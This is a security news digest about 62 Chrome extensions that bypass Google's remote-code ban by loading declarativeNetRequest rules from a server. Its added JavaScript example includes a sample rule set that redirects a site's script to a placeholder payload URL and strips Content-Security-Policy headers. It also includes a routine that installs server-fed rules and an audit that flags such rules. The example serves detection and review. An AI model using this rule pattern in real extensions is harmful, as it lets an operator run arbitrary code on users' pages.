62 malicious Chrome extensions have found ways around Google's ban on remote code execution in extensions. They are attributed to three companies: Phoenix Invicta, Technosense Media, and, most notably, Sweet VPN. The extensions inject ads and, because their operators can change what they do after installation, could also compromise user data.
Phoenix Invicta, formerly Funteq Inc., has a convoluted corporate setup, with entities in the US and Hong Kong and operations in Ukraine. Its extensions sidestep Google's restriction by abusing the declarativeNetRequest API: instead of downloading JavaScript, they download request-handling rules from the operator's server. Such rules can redirect a page's script requests to operator-controlled URLs or strip response headers such as Content-Security-Policy, so the server decides what code runs on the page even though the extension itself never evaluates remote code.
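As an added example (not code from this digest or from Palant's write-up), the following shows what a server-pushed declarativeNetRequest rule set of this kind can look like and a small audit routine that flags the rules amounting to remote code execution: redirects of script or frame requests and removal of security headers. The domains are constructed `.invalid` placeholders, the rule set is a constructed sample, and `auditRules` and `applyRemoteRules` are hypothetical names; only `chrome.declarativeNetRequest.getDynamicRules` and `updateDynamicRules` are the real extension API.

```javascript
// Added example: how server-supplied declarativeNetRequest (DNR) rules can
// amount to remote code execution, plus an audit that flags such rules.
// Not code from the digest or from Palant's write-up; all domains are
// constructed .invalid placeholders and the function names are hypothetical.

// Constructed sample of a "config" an extension might fetch from its backend.
// No JavaScript is downloaded, yet rule 1 makes the target site load a script
// chosen by the operator (by redirecting the site's own script request), and
// rule 2 strips the CSP header that might otherwise block it. Rule 3 is the
// kind of benign blocking rule an ad blocker would ship.
const SAMPLE_REMOTE_CONFIG = {
  rules: [
    {
      id: 1,
      priority: 1,
      action: {
        type: "redirect",
        redirect: { url: "https://cdn.operator-backend.invalid/payload.js" },
      },
      condition: {
        urlFilter: "||target-site.invalid/static/app.js",
        resourceTypes: ["script"],
      },
    },
    {
      id: 2,
      priority: 1,
      action: {
        type: "modifyHeaders",
        responseHeaders: [
          { header: "content-security-policy", operation: "remove" },
        ],
      },
      condition: {
        urlFilter: "||target-site.invalid",
        resourceTypes: ["main_frame", "sub_frame"],
      },
    },
    {
      id: 3,
      priority: 1,
      action: { type: "block" },
      condition: { urlFilter: "||tracker.invalid", resourceTypes: ["script"] },
    },
  ],
};

// Response headers whose removal or overwrite weakens the page's own defences.
const SECURITY_HEADERS = new Set([
  "content-security-policy",
  "content-security-policy-report-only",
  "x-frame-options",
  "strict-transport-security",
]);

// Resource types where a redirect hands control of executable content to
// whoever owns the destination URL.
const CODE_TYPES = new Set(["script", "main_frame", "sub_frame"]);

// Flag rules that redirect code or strip security headers. Returns an array
// of { ruleId, severity, reason }; an empty array means nothing suspicious.
function auditRules(rules) {
  const findings = [];
  for (const rule of rules) {
    const action = rule.action || {};
    const cond = rule.condition || {};
    const types = cond.resourceTypes || []; // empty list = all types in DNR
    const filter = cond.urlFilter || cond.regexFilter || "(any URL)";

    if (action.type === "redirect") {
      const r = action.redirect || {};
      const dest = r.url || r.regexSubstitution ||
        (r.extensionPath ? `extension:${r.extensionPath}` : "(URL transform)");
      const codeLike = types.length === 0 || types.some((t) => CODE_TYPES.has(t));
      findings.push({
        ruleId: rule.id,
        severity: codeLike ? "high" : "medium",
        reason: `redirects ${types.join(",") || "all resource types"} matching ${filter} to ${dest}`,
      });
    }

    if (action.type === "modifyHeaders") {
      for (const h of action.responseHeaders || []) {
        const name = String(h.header || "").toLowerCase();
        if (SECURITY_HEADERS.has(name) && (h.operation === "remove" || h.operation === "set")) {
          findings.push({
            ruleId: rule.id,
            severity: "high",
            reason: `${h.operation}s response header ${name} on ${filter}`,
          });
        }
      }
    }
  }
  return findings;
}

// The install side, as an extension would do it: replace all dynamic rules
// with the server's set. Guarded so the file also runs outside a browser.
async function applyRemoteRules(config) {
  const dnr = globalThis.chrome && globalThis.chrome.declarativeNetRequest;
  if (!dnr) return false;
  const existing = await dnr.getDynamicRules();
  await dnr.updateDynamicRules({
    removeRuleIds: existing.map((r) => r.id),
    addRules: config.rules,
  });
  return true;
}

for (const f of auditRules(SAMPLE_REMOTE_CONFIG.rules)) {
  console.log(`rule ${f.ruleId} [${f.severity}]: ${f.reason}`);
}
```

The point of the audit is that nothing in the extension package itself looks like remote code: a reviewer who only greps for `eval`, `Function` or `<script>` injection sees a clean Manifest V3 extension, while the rule set fetched at runtime decides which scripts the visited page actually executes. Checking the rules an extension installs (dynamic rules in particular, since those come from outside the package) is the check that catches this pattern.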
Google's response has been inconsistent: some extensions were removed after being reported, while others using the same techniques remain in the Chrome Web Store. The case underscores ongoing security concerns in the Chrome Web Store and the need for more robust monitoring and enforcement by Google.
Write-up: https://palant.info/2025/01/20/malicious-extensions-circumvent-googles-remote-code-ban/